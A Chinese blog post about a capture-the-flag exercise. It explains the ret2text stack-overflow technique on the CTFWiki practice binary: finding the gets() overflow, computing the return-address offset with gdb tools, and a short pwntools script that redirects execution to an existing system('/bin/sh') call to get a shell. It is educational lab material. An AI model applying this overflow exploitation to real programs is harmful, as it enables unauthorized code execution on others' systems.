pwn栈溢出学习 基本ROP——ret2text

最新推荐文章于 2024-10-05 18:28:51 发布
最新推荐文章于 2024-10-05 18:28:51 发布
阅读量411 收藏 2
点赞数
分类专栏: Pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MrTreebook/article/details/121069932
版权
本文详细介绍了如何通过检查栈特性、IDA Pro分析、gdb调试来计算栈溢出时ret2text的攻击路径。涉及步骤包括检查NX保护、计算s相对于ebp的偏移、定位system函数地址,并利用gdb获取覆盖数据大小,最终编写并执行exploit。
摘要由CSDN通过智能技术生成

CTFWiki 栈溢出 ret2text

目录

1.checksec跑一下

在这里插入图片描述

  • NX enable :栈不可执行
  • 对于这个题目来说执不执行都无所谓

2.IDA pro看一下

2.1. 计算s相对ebp的偏移量

2.1.1. 手动计算

在这里插入图片描述

  • 看到一个危险函数 gets()
  • 看到[esp + 1ch] [ebp - 64h]
  • 这个时候我们要算一下需要发送多少数据才能覆盖栈
  • 这两个方括号里面代表的是 s 分别到 esp 和 ebp 的距离
  • 我们想要的得到的是ebp - s 的值
  • 因此我们要算出 s 的地址
  • s的地址就应该是esp+1c
    这里附上图看看
    在这里插入图片描述
  • ebp指向栈底 是高地址
  • esp指向栈顶 是低地址
  • s距离esp的偏移是0x1c
  • 下面看看gdb动态调试
  • 在学习gdb的时候遇到的诸多问题请看我写的另一篇文章
    点至这里阅读原文

2.1.2. 直接使用peda计算

pattern create 200
pattren offset 溢出地址

在这里插入图片描述

2.1.3 用pwndbg计算

cyclic 100           //生成100个byte数据
cyclic -l 溢出地址

看一下样例
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
注:2.1.3是非本题样例

2.2 看一下system函数

在这里插入图片描述

  • 在secure函数中有调用system函数
  • 我们直接找到调用system("/bin/sh")的地址
    在这里插入图片描述
    target = 0804863A

3.gdb动态调试获取覆盖数据大小

在这里插入图片描述

  • s 相对于 ebp 的偏移为 0x188 - 100 + 0x1c = 0x6c
  • s 相对于返回地址的偏移为 0x6c+4

4.编写exp

from pwn import *

sh = process('./ret2text')
target = 0x804863a
sh.sendline('A' * (0x6c+4) + p32(target))
sh.interactive()

在这里插入图片描述
可以看到运行之后成功的拿到了权限

==Microsoft==
关注
专栏目录
pwn小白入门03---ret2text
weixin_45943522的博客
02-21 6666
什么是栈溢出栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈中的变量的值被改变(比如gets函数,他不会去验证你输入的值的长度,通过这个函数,你可以往一个本身大小为4字节的数组中填入任意大小的数据,如果填入8字节的数据,将会导致栈溢出,进而程序报错)。就像是往杯子里倒水,水满了溢出来最后烫到你一样。 最简单的栈溢出利用:ret2text 通过栈溢出修改call指令保存在栈上的返回地址(eip的值),这样cpu执行ret指令的时候,就会将被修改的值从栈上取
pwn ret2text
young‘s blog
02-06 1485
好久没有写博客了,今天记录一下做ctf-wiki上ret2text的过程,也记录一下学到的东西,一点一点积累成长。 地址:ctf-wiki 源程序也在里面 边看视频边学的,视频地址为: ret2text 程序下载好之后通过checksec查看保护措施: 没有开启canary,32位动态链接程序 知道程序的基本信息后运行一下程序,看看程序都有什么功能。 测试后得知只有一个输入点。 拖进ida分析一下...
pwn入门之ret2text
wangxunyu6的博客
01-07 1317
重点来了:存在gets函数,先让我们了解一下gets函数,它可以无限读入数据,造成栈溢出。观察到s变量距离ebp有0x28的距离,对于这个题来说栈结构为先读入s变量然后下面是ebp然后才是返回地址,那么我们就有思路了,往s变量里面填充垃圾数据直到返回地址把返回地址改为我们需要的flag的位置。第四行:这是我们人为构造的代码数据,根据思路填充垃圾数据0x28个,因为这是32位elf文件所以需要再加上4,p32(flag)即为我们的返回地址。0不用管buf是我们输入数据的地方,0x32是能写入的字节数。
菜鸟PWN手进阶之栈溢出基础
re1wn
01-03 7251
菜鸟PWN手进阶之栈溢出基础
pwn自学笔记(1)--——ret2text
最新发布
CDU__mint__的博客
10-05 1180
此篇文章是对ret2text学习初步总结。目标利用栈溢出执行危险程序获取shell。
pwn ,ret2text
amber_o0k的博客
07-28 279
直接gdb ret2text,然后start进调试模式 用gdb自带命令,pattern create 200,生成一个200个字符的字符串,后面会用到。 用gdb自带命令,pattern create 200,生成一个200个字符的字符串 单走一个r,让程序跑起来 ,且程序会让你输入,把字符串怼进去 然后程序就会报错了,EIP显示的字符就是程序即将执行的字符,需要将这个字符替换为想要执行的函数的地址。 用gdb自带的命令数一下在“AA8A”之前还有多少个字符...
PWN 栈溢出
u012173720的博客
11-21 1025
Beginning 如果想用栈溢出来执行攻击指令,就要在溢出数据内包含攻击指令的内容或地址,并且要将程序控制权交给该指令。攻击指令可以是自定义的指令片段,也可以利用系统内已有的函数及指令 0x01 函数调用栈是指程序运行时内存一段连续的区域,用来保存函数运行时的状态信息,包括函数参数与局部变量等。称之为“栈”是因为发生函数调用时,调用函数(caller)的状态被保存在栈内,被调用函数(ca...
栈溢出脚本_CTF必备技能丨Linux Pwn入门教程——栈溢出基础(文末有彩蛋)
weixin_39723248的博客
11-20 270
这是一套Linux Pwn入门教程系列,作者依据i春秋Pwn入门课程中的技术分类,并结合近几年赛事中出现的一些题目和文章整理出一份相对完整的Linux Pwn教程。课程回顾>>Linux Pwn入门教程第一章:环境配置更多Pwn视频课程本系列教程仅针对i386/amd64下的Linux Pwn常见的Pwn手法,如栈,堆,整数溢出,格式化字符串,条件竞争等进行介绍,所有环境都会...
跟着CTF-wiki学pwn——ret2text
qq_42882717的博客
06-21 1224
肾么叫做万死不辞呀,就是每天被气死一万次,也不辞职…(哭哭
栈溢出基础——ROP1.0的例题
07-13
栈溢出基础——ROP1.0的例题 在网络安全领域,栈溢出是一种常见的漏洞类型,它源于程序处理内存时的错误,可能导致攻击者控制程序执行流程,从而执行恶意代码。本篇将深入探讨栈溢出的基础知识,并通过一个名为...
高级栈溢出技术—ROP实战(pivot)
ChuMeng1999的博客
01-09 682
目录预备知识关于ROP本系列rop实战题目的背景pivot涉及知识点实验目的实验环境实验步骤一实验步骤二实验步骤三 预备知识 关于ROP ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。 ROP是一种攻击技术,其中攻击者使用堆栈的控制来在现有程序代码中的子程序中的返回指令之前,立即间接地执行精心挑选的指令或机器指令组。 本系列rop实战题目的背景 来自ROPEmporium
PWN基础7:Rop-Ret2Text介绍 及 插件配置
prettyX的博客
07-11 673
ROP概述 Return-oriented Programming,面向返回的编程,是一种新型的基于代码复用技术的攻击,攻击者从已有的库或可执行文件中提取指令片段,构建恶意代码 ROP的核心思想:攻击者扫描已有的动态链接库和可执行文件,提取出可以利用的指令片段(gadget),这些指令片段均以ret指令结尾,即用ret指令实现指令片段执行流的衔接。 ROP攻击是利用以ret结尾的程序片段,操作这些栈相关寄存器,控制程序的流程,执行相应的gadget,实施攻击者预设目标 ROP不同于return-to
linux 64位 内存泄漏,64位linux系统:栈溢出+ret2libc ROP attack
weixin_34185033的博客
05-01 732
一.实验要求栈溢出+ ret2libc ROP 操作系统:Ubuntu 16.04 64bit 安全机制:不可执行位保护,ASLR(内存地址随机化)打开安全机制,确保×××能绕过以上安全机制,利用漏洞完成attack,实现基本目标:调用system(“/bin/sh”),打开shell。二.实验概述ret2libc(return-into-libc)是一种利用缓冲区溢出的代码复用技术,...
PWN ret2text
prettyX的博客
11-21 956
今天跟着B站UP学习ROP,向UP表示感谢。 0X01 什么是ROP ROP就是shellcode的一种特殊写法。ROP技术就是不需要自己动手写shellcode,只是利用文件中给出的多个跳转指令,实现利用原有代码达到获取shell的目的。 0X02 ROP使用的地方 1、当程序开启了NX保护机制;NX策略是使栈区域的代码无法执行,但我们可以使用RO...
PWN入门之栈溢出
weixin_44681716的博客
03-12 1235
PWN入门 先利用IDA对pwn文件进行静态调试 对pwn文件进行反编译 因为CFT是夺旗赛,所以我们首先要找到get flag的函数 利用gdb进行动态调试 我们就可以利用栈溢出获取系统权限 利用通过输入大量的字符来使其达到溢出,判断溢出的位置,从而获得栈长。 我们利用cyclic length函数产生若干个有序字符。 利用cyclic 300产生300个有序字符。 用gdb来运...
PWN入门--栈溢出
yjh_fnu_ltn的博客
05-07 1369
将原main函数的ebp值栈低入栈保存,再为ebp换上新的esp寄存器值,作为访问fun函数局部变量等的基址。最后退出fun函数,需要将原ebp的值恢复,关闭并销毁fun函数的栈帧:通常使用与生成栈帧相反的指令。最后,在main函数中删除栈(在调用者还是在被调用者中清除栈,取决于函数的调用规定)。这次从栈的角度详细,计算垃圾数据填充大小时多少,system函数的参数如何传递的问题。后面看到盗用fun函数的过程,使用栈完成传参,此时还没有进入到fun函数,所以其。,在栈溢出的漏洞中,我们经常要用我们。
PWN初体验之ret2text
weixin_43137410的博客
08-04 760
"Hello,World!"的浪漫可能只有直男才懂!
9.pwn 栈溢出基本ROP
2301_80361487的博客
07-08 1196
函数中的存储在栈中的局部变量数组边界检查不严格发生越界写,造成用户输入覆盖到缓冲区外的数据内容,由于栈中同时存在着与函数调用参数的相关信息,栈溢出可以导致控制流劫持。
ctfshow PWN 栈溢出
08-23
在ctfshow PWN中,栈溢出是一种常见的攻击方式。 根据提供的引用,我了解到栈溢出是一种通过向程序输入过长的数据导致数据溢出栈的一种攻击手段。栈是一种数据结构,用于存储程序的局部变量和函数调用的返回地址等...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

==Microsoft==

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值